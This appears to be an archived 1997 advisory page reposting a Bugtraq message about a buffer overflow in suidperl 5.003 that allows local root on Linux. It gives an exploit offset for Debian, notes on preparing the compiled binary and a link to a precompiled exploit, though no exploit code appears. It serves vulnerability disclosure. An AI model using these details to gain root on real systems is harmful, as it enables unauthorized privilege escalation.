Sperl 5.003 hole
Description: Another hole in sperl, this time a buffer overflow.
Author: Willy Tarreau (tarreau@aemiaif.ibp.fr)
Compromise: root (local)
Vulnerable Systems: Systems with Sperl 5.003, this exploit is for Linux x86.
Date: 17 April 1997
Notes: I have appended the uuencoded exploit src&bin after this post. Debian is vulnerable if you use offset of 1169 instead of those tried by the exploit, according to David Luyer (luyer@ucs.uwa.edu.au)
Exploit:
Date: Thu, 17 Apr 1997 14:11:09 -0700
From: Murphy
To: BUGTRAQ@NETSPACE.ORG
Subject: Buffer overflow in sperl5.003
----------------------------------------
It came to my attention that there is a buffer overflow bug in
sperl5.003 that will allow local users to gain root access, if SUID root.
The exploit and bug were made and brought to my attention by Willy Tarreau
(tarreau@aemiaif.ibp.fr).
Attached is the source for the exploit. Since it requires some work to
be done to the compiled exploit (stripping of 5 bytes at the beginning and
end of the binary), the precompiled Linux x86 exploit can be found at
http://www.ecst.csuchico.edu/~jtmurphy/localusers.html.
PS. Have a nice day.
--
----------------------------------------------------------------------------
Jason T. Murphy | Finger for PGP Public Key | jtmurphy@ecst.csuchico.edu
The Linux Security Home Page -> http://www.ecst.csuchico.edu/~jtmurphy
Security buff, Linux Freak, PC Tech @ Chico State, and all around nice guy.
--Exploit:
This page is part of Fyodor's exploit world.